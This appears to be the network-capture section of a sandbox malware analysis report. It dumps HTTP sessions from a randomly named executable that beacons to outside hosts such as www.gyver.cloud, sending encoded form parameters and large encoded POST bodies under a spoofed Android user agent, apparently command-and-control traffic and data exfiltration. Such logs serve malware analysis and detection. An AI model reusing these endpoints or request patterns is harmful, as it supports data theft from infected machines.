Aug 27, 2024 17:45:52.320806980 CEST	1289	IN	Data Raw: 7c 5a a0 ac 33 a8 28 2a 54 ca df 02 7a 79 dc 88 65 49 48 e3 a3 16 5a 59 6b 6a 41 e1 16 ef 05 4c 24 ac e6 d3 4b d0 f4 89 03 8c 07 2f fc 6b eb f8 e7 0c ac 6d ed 1c 63 ba 87 b8 73 79 f9 0c c3 5c b8 ca 83 ee 19 26 b3 b1 1f 87 e7 b8 15 77 15 03 a4 86 Data Ascii: \|Z3(TzyeIHZYkjAL$K/kmcsy\&w-D\|/;3,IU~RD\|h#c)9@K/0i@gO$d^B\)p40*]"bckj?wLt{niv'}@s>D{{Ol#e&}
Aug 27, 2024 17:45:52.320930958 CEST	1289	IN	Data Raw: 87 65 d0 3a 23 15 19 7b 6f 3d a2 32 e1 85 23 e5 75 89 b2 fd ce ec ca ca dc c8 95 fe d5 1d 8d 45 f5 8d d5 d2 09 b3 49 6b 75 53 02 2e 9d 20 15 ea 7b 8c 94 d9 7f d2 d7 43 1c be 95 92 ee f7 44 6c bf 96 29 a9 37 c1 3a c2 b5 e5 8f 2c 00 3d bc 49 22 89 Data Ascii: e:#{o=2#uEIkuS. {CDl)7:,=I"75OshBhV({t~Umulbi!3_gtFmLPUap.U+D_#ZeHXA1nuKtRg?
Aug 27, 2024 17:45:52.320943117 CEST	1289	IN	Data Raw: 1b 54 0f ff 42 ea 93 3d 1e 08 d3 d1 db 9c c6 c7 9e 8b b9 ff 38 7b 8f d8 d6 b6 70 1c e8 d3 39 1b 0c 0a 33 9c 8b 34 d0 2c 45 90 d8 ec ec 39 bf 2a e3 6f 36 fb 42 ba 1b 2a ff 60 62 4e 3e 5d 5a bf 88 51 54 5c e9 f1 ed 9a 2c b6 86 f5 fd 08 b1 0d 19 57 Data Ascii: TB=8{p934,E9o6B`bN>]ZQT\,WK*vf=[HkH)1fl[LF9)Sq660O,2UBm$.smrU7kH-QXX,\\fv-)AF(R0w9GZYdn2!f6
Aug 27, 2024 17:45:52.321042061 CEST	1289	IN	Data Raw: 61 40 0d a6 44 7e fb 1a 26 15 02 62 69 8d 99 e3 06 59 35 a2 7d 56 b7 8f 8d 88 6e 0f 26 9b f2 fd 71 3c bb 3f fe 0a ff 27 03 81 95 0e c8 43 8b 7c cc da 72 20 20 db 79 e4 fa ea bd a9 7d 3d 0a 6a c0 ca 2d a2 c9 db 3b 19 13 da 1d 63 b9 c8 0d cf fd 3e Data Ascii: a@D~&biY5}Vn&q<?'C\|r y}=j-;c>rmO.,@Jf2sb>S+i6/ZB#+74A[R@$MSQBp)@Qy1j!;Lj>PH%S#99^AXA'br/-}
Aug 27, 2024 17:45:52.321053028 CEST	1289	IN	Data Raw: b0 35 21 aa 4f 33 f4 92 db a8 25 63 b3 48 32 29 bc 18 71 a3 e0 5a 68 22 2f 2f 26 b9 a1 55 90 c3 47 3a e3 8b 43 a0 d8 56 d1 da 15 59 a4 7c a4 c2 c9 2d 91 8f c6 64 bf a5 1d 6d 3e 73 ee fb e5 03 aa ca 23 d7 c0 5f b7 e6 27 2d 5e 88 55 2b 41 76 8d 44 Data Ascii: 5!O3%cH2)qZh"//&UG:CVY\|-dm>s#_'-^U+AvD'B"\4<c,0kC)}$SwE&%sKU!#2:jFDM;-DsU@,SIul!~ \8pL`fxsOZ>?x\|BKm7 ]\|.$
Aug 27, 2024 17:45:52.321064949 CEST	1289	IN	Data Raw: fb 15 0f 0a ae b9 7a 22 28 4b 66 90 94 0c a8 02 4e 85 33 98 a6 02 9d 36 34 b0 fa 90 33 18 cd ae 39 71 b3 cf cd f7 ce 7f ee 95 fd 62 ff 0b 72 3d 87 7b 57 3f ff 69 56 0f e6 d9 8f 64 98 af ce 6c 02 68 01 5c c3 f3 ef 39 8d d5 ff fd 00 0a fe 25 53 02 Data Ascii: z"(KfN36439qbr={W?iVdlh\9%SRq%~ .0G#x!-]?+\|pA/!fwG9'~T e#cIN!WUr\|Z$N(MJzTNppba
Aug 27, 2024 17:45:52.457650900 CEST	1289	IN	Data Raw: 70 0d f8 4a 44 7f fe c2 6f d8 75 4d c1 41 47 ea e1 72 ff 6e d1 b6 19 26 10 bb 7d ed 17 71 15 08 8d d7 16 32 40 6a f9 89 b6 30 e0 9b 26 d4 a5 95 f3 d2 73 b9 73 46 50 ef f9 3a b0 0f e7 97 e8 dc 9d 10 41 3c 98 31 ed a3 e4 45 78 c9 b0 83 a7 71 17 6e Data Ascii: pJDouMAGrn&}q2@j0&ssFP:A<1Exqn"Y%iIDp}(e3a2KEH~2x#YCH0K>d[LX*TsgW!8h6 t(,-vHRh=b8X@D~QYjD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49807	154.23.184.218	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:46:30.460151911 CEST	522	OUT	GET /y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.23ddv.top Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:46:30.761910915 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:46:30 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4f874-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49808	76.223.67.189	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:46:51.116849899 CEST	785	OUT	POST /7arp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.gyver.cloud Origin: http://www.gyver.cloud Referer: http://www.gyver.cloud/7arp/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 4c 66 2f 58 6e 77 39 56 75 5a 56 6b 54 77 42 4b 37 35 6a 52 67 5a 7a 61 35 41 30 59 32 66 51 66 6f 77 4b 70 35 33 39 45 44 4d 6a 5a 78 49 37 31 48 66 72 51 31 57 79 4a 2b 59 52 45 55 47 61 31 78 7a 4b 6b 72 50 4e 59 45 4d 41 6d 54 34 61 4d 65 6d 63 4e 69 7a 62 59 2b 37 6e 45 37 4e 71 49 65 66 35 32 50 36 52 43 2b 5a 58 4e 6b 41 46 6a 70 71 47 57 50 38 78 76 4b 71 59 39 63 63 4c 4c 79 46 73 47 45 5a 37 47 50 46 65 37 51 78 42 56 79 57 33 6e 75 5a 51 7a 35 31 66 72 6b 6b 54 42 41 34 6e 6f 43 4b 35 62 34 72 69 45 4b 30 5a 79 7a 59 30 32 76 77 3d 3d Data Ascii: AvLLLbOh=Qdac4tatAq89Lf/Xnw9VuZVkTwBK75jRgZza5A0Y2fQfowKp539EDMjZxI71HfrQ1WyJ+YREUGa1xzKkrPNYEMAmT4aMemcNizbY+7nE7NqIef52P6RC+ZXNkAFjpqGWP8xvKqY9ccLLyFsGEZ7GPFe7QxBVyW3nuZQz51frkkTBA4noCK5b4riEK0ZyzY02vw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49809	76.223.67.189	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:46:53.751492023 CEST	1125	OUT	POST /7arp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.gyver.cloud Origin: http://www.gyver.cloud Referer: http://www.gyver.cloud/7arp/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 49 2f 76 58 6b 58 70 56 37 4a 56 6a 57 77 42 4b 77 5a 6a 56 67 5a 2f 61 35 42 78 46 32 4d 34 66 6f 53 53 70 36 31 5a 45 47 4d 6a 5a 37 6f 37 77 59 76 72 68 31 57 2f 30 2b 5a 42 45 55 47 6d 31 72 68 43 6b 38 76 4e 5a 64 38 41 35 51 34 61 4e 61 6d 63 51 69 7a 65 35 2b 35 62 45 36 39 4f 49 66 63 42 32 65 34 35 42 31 5a 58 50 78 51 46 67 2f 61 47 59 50 38 4e 6e 4b 76 55 4c 62 75 58 4c 79 6b 41 47 57 4a 37 5a 59 46 65 67 66 52 41 34 6b 54 72 71 6d 35 77 35 31 47 50 72 6a 58 58 69 4d 36 4c 4f 44 73 4e 6c 70 5a 79 54 43 51 63 53 6d 63 78 61 72 67 72 71 78 4f 66 4f 64 47 4e 66 72 65 43 5a 6a 66 37 41 72 42 74 2f 76 4f 68 6f 34 73 5a 57 6f 36 66 57 50 52 67 4d 54 39 76 50 30 37 39 39 4a 6e 45 59 30 53 7a 79 41 5a 65 41 67 46 4e 46 68 55 33 75 56 5a 6d 68 33 73 57 41 35 61 49 51 4f 46 7a 65 79 4d 46 48 76 54 5a 73 45 72 45 50 70 72 68 34 51 7a 37 65 68 63 32 74 53 54 70 46 54 4f 65 36 42 6a 2b 6a 69 64 79 4e 75 57 79 54 47 4d 44 69 44 39 66 4b 4e [TRUNCATED] Data Ascii: AvLLLbOh=Qdac4tatAq89I/vXkXpV7JVjWwBKwZjVgZ/a5BxF2M4foSSp61ZEGMjZ7o7wYvrh1W/0+ZBEUGm1rhCk8vNZd8A5Q4aNamcQize5+5bE69OIfcB2e45B1ZXPxQFg/aGYP8NnKvULbuXLykAGWJ7ZYFegfRA4kTrqm5w51GPrjXXiM6LODsNlpZyTCQcSmcxargrqxOfOdGNfreCZjf7ArBt/vOho4sZWo6fWPRgMT9vP0799JnEY0SzyAZeAgFNFhU3uVZmh3sWA5aIQOFzeyMFHvTZsErEPprh4Qz7ehc2tSTpFTOe6Bj+jidyNuWyTGMDiD9fKN8YvqjtWW6vnv2Xp9OT3E46XHXNaVhbQeipRJtAzOeb5PCGK4+inyFq7/0L3lASkw3njdv7tbWTwWWdGJTXs5NzeasL6uscKjQEkffeiBx8kIDSB1J+Al3URlLka2s7mGoyYoarn5Mxey+ej8bewmfVEtz22LumxGptF0Mm2dr1MR6UtrIRpB/sFaZQEz7k/OirfP9MN0eiG43Q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49810	76.223.67.189	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:46:56.391618013 CEST	3867	OUT	POST /7arp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.gyver.cloud Origin: http://www.gyver.cloud Referer: http://www.gyver.cloud/7arp/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 49 2f 76 58 6b 58 70 56 37 4a 56 6a 57 77 42 4b 77 5a 6a 56 67 5a 2f 61 35 42 78 46 32 4b 67 66 70 6e 4f 70 36 55 5a 45 42 4d 6a 5a 33 49 37 78 59 76 72 47 31 57 32 2f 2b 5a 4e 2b 55 41 71 31 79 57 6d 6b 38 39 56 5a 4c 73 41 34 56 34 61 50 65 6d 64 4d 69 7a 62 2b 2b 34 2b 7a 37 4e 53 49 65 62 39 32 49 5a 35 43 32 4a 58 4e 78 51 46 73 30 36 47 6d 50 38 35 4a 4b 76 51 4c 62 73 54 4c 78 77 6f 47 46 6f 37 5a 66 56 65 6e 57 78 41 37 32 54 71 51 6d 35 31 41 31 47 50 56 6a 57 54 69 4d 36 72 4f 43 72 78 69 71 35 79 54 4c 77 63 52 33 73 31 65 72 67 47 70 78 4f 37 4f 64 42 4a 66 71 2b 43 5a 70 61 58 44 6a 42 74 39 69 75 67 79 75 73 64 65 6f 36 4b 6e 50 55 34 4d 53 4e 72 50 75 6f 56 39 46 6b 63 59 36 53 7a 77 50 35 65 58 72 6c 4d 65 68 55 47 48 56 59 48 55 33 76 36 41 6a 2b 55 51 46 45 7a 5a 78 73 46 42 32 6a 59 30 57 62 41 54 70 72 77 6e 51 7a 36 46 68 64 79 74 53 48 56 46 42 4d 32 39 4d 54 2f 72 71 39 79 45 37 6d 2b 4a 47 4d 50 71 44 2b 66 61 4e [TRUNCATED] Data Ascii: AvLLLbOh=Qdac4tatAq89I/vXkXpV7JVjWwBKwZjVgZ/a5BxF2KgfpnOp6UZEBMjZ3I7xYvrG1W2/+ZN+UAq1yWmk89VZLsA4V4aPemdMizb++4+z7NSIeb92IZ5C2JXNxQFs06GmP85JKvQLbsTLxwoGFo7ZfVenWxA72TqQm51A1GPVjWTiM6rOCrxiq5yTLwcR3s1ergGpxO7OdBJfq+CZpaXDjBt9iugyusdeo6KnPU4MSNrPuoV9FkcY6SzwP5eXrlMehUGHVYHU3v6Aj+UQFEzZxsFB2jY0WbATprwnQz6FhdytSHVFBM29MT/rq9yE7m+JGMPqD+faN7gvqDtWUdzkhGXugeSuJY6mHXB3Vkj6dSFRIdQzEuavECGOzei62Fq7/0HJlAWk3GvjfdjtLRnwUWdAJTX95N/lasDlusMwjW8kfuuiC0QnNzSA/p+X6nROlLIs2sqEFaGY6q7nqcxd3eee27ecieodtz6MLuChGrtFkqL5MoRxNZAw2t4QW/kOQ5U48p4zJFPHRN0nmdm7rghsCuB+cIgsvzxbKRE01Wb1FYcQsfql7A/tgh/76/CycUUjbtPALjoIiA+cHUJrShC6Cx9GNREzSytVXwuBgCYNAA4ycTwEITp0E7BxZC1ACsax2/3drYI9/A0yluIIPGjMLmSSTe8iDCkYdtTyTAhMVTNV/ykAA3DTvchT0H6yuOaOD6qyFIs1Gg7PRm9gFCY5X/J6DNWr0B8PcS6taD95ootFDpHX7AuBvFLg7eUdeVhBLPbBizXCxrG7nLFnCkLcOhffbz2SQHjtO7vAWPeDHdCWvlkkBIvnKCO8RgXTUWMX+S60QdfSIkzKe0xX+zdlql0ZS2tmhEnVDdK3IdD5bmsewjlVV5mrIzxva7jDy5QG7TQa8mrTN6hC+fUqM+YSNL1u8LaacF9gxC1j0kdug+1bIy9Gg4yuMWek2QDeItqE7778Lt2CbDS+fHNijsmmZYfvtkqhL1Wuwzf7yQI [TRUNCATED]
Aug 27, 2024 17:46:56.391752005 CEST	9023	OUT	Data Raw: 36 38 6b 36 72 36 70 75 6c 71 37 63 37 6b 49 66 2b 41 54 68 74 47 79 4b 52 37 68 71 49 36 46 57 76 2b 57 65 2b 54 72 32 59 63 73 6e 32 76 37 37 70 51 63 4c 4a 4c 6f 79 6b 6d 55 6c 6c 61 68 6f 37 4c 34 45 66 46 59 50 6c 2f 6e 76 33 65 65 57 49 4b Data Ascii: 68k6r6pulq7c7kIf+AThtGyKR7hqI6FWv+We+Tr2Ycsn2v77pQcLJLoykmUllaho7L4EfFYPl/nv3eeWIKQibZUV00zgSZNXAuda/EFAG8pzyQ1wDzdrDyKwSSRg0Y4L3Psu7c6kAPITeBXlkmLKbu9WVg86sJY/wdbM7D8MRE6j9eqdo1CcsvURnsGUw4IIEonSFtfaC2P80vDaDbgcL3CZmvT4HwOAzNH6LxpJxxcbyYRxUmH
Aug 27, 2024 17:46:56.492734909 CEST	2578	OUT	Data Raw: 51 46 71 73 39 6f 4d 53 55 37 30 57 62 51 2b 56 68 77 6a 63 57 39 73 6b 6c 45 70 69 44 4a 41 68 2b 79 2f 69 72 2f 74 47 45 57 39 67 46 4a 45 6e 2f 42 71 39 2b 65 42 46 72 78 76 6c 6b 62 57 48 30 35 53 36 2b 67 33 6f 2b 35 52 61 44 31 52 66 47 6f Data Ascii: QFqs9oMSU70WbQ+VhwjcW9sklEpiDJAh+y/ir/tGEW9gFJEn/Bq9+eBFrxvlkbWH05S6+g3o+5RaD1RfGoQJWCqb7VI4BRPVwC7niHmklw2oxL1em3xBI4YDy3uTL2udaGQkI3cX9A4kISt3N5q3WnmdQkoBM7iX89Hdm6PlI+UeM2oNJ59qfleuCmLZRFfb6l/bYMWsgbxpEPZggvcn7vic8BZ9wato8AYjgaz42CZaGbNkkxp
Aug 27, 2024 17:46:56.492774010 CEST	1289	OUT	Data Raw: 42 67 4a 31 6f 48 47 74 30 41 5a 6e 7a 78 5a 56 70 58 77 67 4a 57 4e 44 59 71 62 6d 55 4a 51 54 36 38 41 58 6d 71 37 53 52 33 77 75 71 39 79 65 74 72 67 38 34 34 78 39 6f 62 4c 56 4e 4c 69 63 6a 49 4e 34 2f 45 64 51 74 6a 44 61 47 46 49 2b 50 6e Data Ascii: BgJ1oHGt0AZnzxZVpXwgJWNDYqbmUJQT68AXmq7SR3wuq9yetrg844x9obLVNLicjIN4/EdQtjDaGFI+Pn5a22AtHVx8zrsfRcBRuDNTGq6xN4nyq2CvimJVeqjBUFHxtC1mu+FefByqva48g4Kg4Zf/gH/6msiguHaor5SSposi/Sn7e7zOYf+O0kXDoyAoHYhHSPboKNO4yL2AbnuxgRgPIr1i2FKMQXNKOBLmUAbrRw6obot
Aug 27, 2024 17:46:56.492819071 CEST	1289	OUT	Data Raw: 39 39 71 6c 43 76 4d 4b 73 34 50 78 45 48 45 34 5a 7a 4a 55 4d 5a 76 6c 6c 2f 6f 36 50 65 54 50 39 38 34 64 74 59 6c 74 30 4a 69 39 75 58 64 4b 70 46 6a 46 4d 51 42 2f 63 76 75 7a 34 74 77 4d 4c 42 70 37 4b 4c 45 7a 7a 43 73 59 67 56 2b 61 56 53 Data Ascii: 99qlCvMKs4PxEHE4ZzJUMZvll/o6PeTP984dtYlt0Ji9uXdKpFjFMQB/cvuz4twMLBp7KLEzzCsYgV+aVSCJcYVWNEy7yiV1RUwDotX6PSOooQxrOBTIhmF4PH0GuaG9hsi1WUvPM/kglqIEW0IWTup4BCuVdM5FCPVBerJN4Ya57A6nAiwffChQCm0ZFjRIUbPMBciYzJ2MmiXGEqt/Fcx+e1lSOHAeCDR6PWM3guX5eA3poXk
Aug 27, 2024 17:46:56.492991924 CEST	9023	OUT	Data Raw: 62 6c 42 6b 42 49 73 62 70 6a 4f 2f 65 69 33 36 7a 67 6c 38 74 65 43 30 71 43 36 36 51 49 72 31 42 58 31 36 31 50 4f 46 67 57 63 38 4a 77 39 77 58 52 31 35 77 5a 65 45 2b 4a 4e 35 55 79 62 50 50 50 58 55 30 56 64 78 67 52 54 75 73 39 64 6f 6e 76 Data Ascii: blBkBIsbpjO/ei36zgl8teC0qC66QIr1BX161POFgWc8Jw9wXR15wZeE+JN5UybPPPXU0VdxgRTus9donv/KO5oJal+ecvcQZptSLTpQvKo2WuWWXYzbpPZl4ItI5mswgNia60Z/0jcn3W5a3cU8XEEK4GcONdAmokkdHsAAvjc6BHiCUT+LLd4aRvndUiWS87DD78yq6MZPSuOQtCtZdRMX09gXHoVFccWZ+5POJP6HQLgHX6x
Aug 27, 2024 17:46:56.493161917 CEST	3867	OUT	Data Raw: 6a 6d 46 7a 59 42 50 6c 55 61 78 53 79 45 63 68 4a 43 37 42 51 4c 43 52 51 65 56 73 74 7a 7a 35 33 76 6c 2b 7a 72 56 74 36 75 6b 36 5a 41 56 53 47 39 35 68 57 4c 31 70 4a 53 61 50 51 66 63 7a 32 69 2b 4e 5a 51 6a 57 31 36 76 6c 59 79 62 4d 50 63 Data Ascii: jmFzYBPlUaxSyEchJC7BQLCRQeVstzz53vl+zrVt6uk6ZAVSG95hWL1pJSaPQfcz2i+NZQjW16vlYybMPcAL+6BNIfQqv5K6UAZcjAlKF7IB/GD0sXr3ksvvK5TvWM1BuV8SC9bvHU/t6+sH9ZiBLblbqRO0FCkicMEUR5oSN8lVPh+iI2j3MwqkNjJomIF9fEocb0i0Uv6CgXTvfSt/pHBZpp9icvNO+aRcexQNO3ZWJUgaC42
Aug 27, 2024 17:46:56.493329048 CEST	1289	OUT	Data Raw: 33 73 41 58 32 58 52 70 45 4c 46 48 6f 44 7a 6c 47 2b 77 56 63 4b 57 49 7a 6f 75 30 64 62 6b 73 70 70 6e 66 31 32 44 56 32 70 44 4c 79 47 61 33 48 38 41 6a 74 2f 6d 61 44 6b 58 56 6b 37 6c 77 5a 6f 7a 55 32 58 6a 59 54 42 57 48 47 65 39 78 6f 78 Data Ascii: 3sAX2XRpELFHoDzlG+wVcKWIzou0dbksppnf12DV2pDLyGa3H8Ajt/maDkXVk7lwZozU2XjYTBWHGe9xoxO6uJQhBRFZavlSUq/lxguU2Zj2gkoK+xRQ0sJBgXb5TXLXrk7akF3CJiE5i/DnWtQLQMbIlkzaZhiCMHrwRN+Kr9qCaN5VF2wB6afOoZLVuMmiBbbRN5e4qWnRQH8nH025+UzV5I65QhTp1jJBPSWZ7i41aC6DLPZ
Aug 27, 2024 17:46:56.493531942 CEST	6445	OUT	Data Raw: 5a 39 36 66 35 6c 57 72 71 54 65 71 64 43 57 43 56 58 78 72 34 4b 39 34 34 52 42 4e 66 37 31 4e 79 58 59 48 46 32 72 52 57 4e 46 63 57 74 6c 43 61 32 2b 7a 37 59 62 44 58 43 55 74 50 35 64 77 52 67 51 6c 31 4d 42 4c 75 76 53 74 6b 58 50 73 43 75 Data Ascii: Z96f5lWrqTeqdCWCVXxr4K944RBNf71NyXYHF2rRWNFcWtlCa2+z7YbDXCUtP5dwRgQl1MBLuvStkXPsCuLMhEcrSBgreU5vIOwPI/F3VkualvE4GHJWfm6Zr9UGNCdHaPpdvzdewXDwBpeld0BG7cTd7amBZb/O2aN6TMEbD8MgNOq2vWhW/gdUIAmjceVcdNlcz5a+n6sJZoPMJdzJ7LKFwhDz2aFg1De6A2Yt/9mpECBuicl
Aug 27, 2024 17:46:56.593945026 CEST	2578	OUT	Data Raw: 53 4e 4e 6e 4e 4e 57 62 44 6d 30 68 66 4a 73 37 51 75 53 62 4f 45 30 65 77 46 37 4c 65 6f 70 6d 55 41 64 63 47 36 67 30 78 52 30 59 4c 52 4e 71 52 44 61 59 6f 48 57 74 71 61 70 6a 79 75 72 58 52 58 52 35 33 35 41 38 71 63 4c 68 4f 4e 71 58 4e 7a Data Ascii: SNNnNNWbDm0hfJs7QuSbOE0ewF7LeopmUAdcG6g0xR0YLRNqRDaYoHWtqapjyurXRXR535A8qcLhONqXNzaVP9MuIwEpuyvN8ntT9YPJZCFKsI/3eVyWI+tdE1zOzaochDNnTEIlaROxvyO+4Ol6Va1y2Egvxai0ClwZJVibPgLSSGFcbuwQjdRMSsk0mD2FRJ8M5OOLsOVLHmsbOKUcvlDUS23MEQrZPYC+tgxgF2fqQqZOgk6
Aug 27, 2024 17:46:56.594110012 CEST	5156	OUT	Data Raw: 5a 55 2f 56 49 37 54 76 5a 46 68 77 72 79 69 65 51 4f 42 32 6c 6a 71 59 65 4d 47 73 77 55 6e 74 61 36 46 66 47 39 42 6c 76 55 71 4a 52 4f 62 32 6e 71 33 72 36 54 68 69 78 6e 4b 54 34 61 6a 4a 76 6f 4a 53 6d 47 65 43 68 4a 34 56 42 57 2f 59 65 6f Data Ascii: ZU/VI7TvZFhwryieQOB2ljqYeMGswUnta6FfG9BlvUqJROb2nq3r6ThixnKT4ajJvoJSmGeChJ4VBW/YeoS3FGx8eJo6PNFw6tGG5Zyf/meMQjs7f1NCpGKxQr9FOG/UrOwUkSdamY9yvYmsZa545uJXlj9u1Bdb3CjuA1ggI8fo4jeX3pPwwigzHe72AXABzH0zVkwMtVZy+02yQQgQm5v6ZvilqAXXHBVDoSgl191Wa0kzJxu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49811	76.223.67.189	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:46:59.029607058 CEST	524	OUT	GET /7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.gyver.cloud Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:46:59.134354115 CEST	397	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 27 Aug 2024 15:46:59 GMT Content-Type: text/html Content-Length: 257 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 76 4c 4c 4c 62 4f 68 3d 64 66 79 38 37 61 66 54 43 35 35 59 56 76 7a 53 37 53 31 6a 77 4c 67 63 62 69 35 77 33 4a 48 7a 6a 61 76 61 78 44 51 61 31 39 64 42 30 33 6a 51 73 6b 59 43 41 38 72 2f 37 61 6e 42 42 2b 76 6f 75 54 2b 56 35 61 78 2b 58 6a 47 6b 75 52 48 73 36 75 73 34 42 63 42 46 51 66 58 4b 64 7a 4a 37 6a 31 54 6a 38 5a 47 4d 37 4a 6e 34 59 65 6c 45 46 36 46 31 35 66 51 3d 26 37 52 42 3d 36 36 6e 50 79 4c 47 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49812	203.161.42.73	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
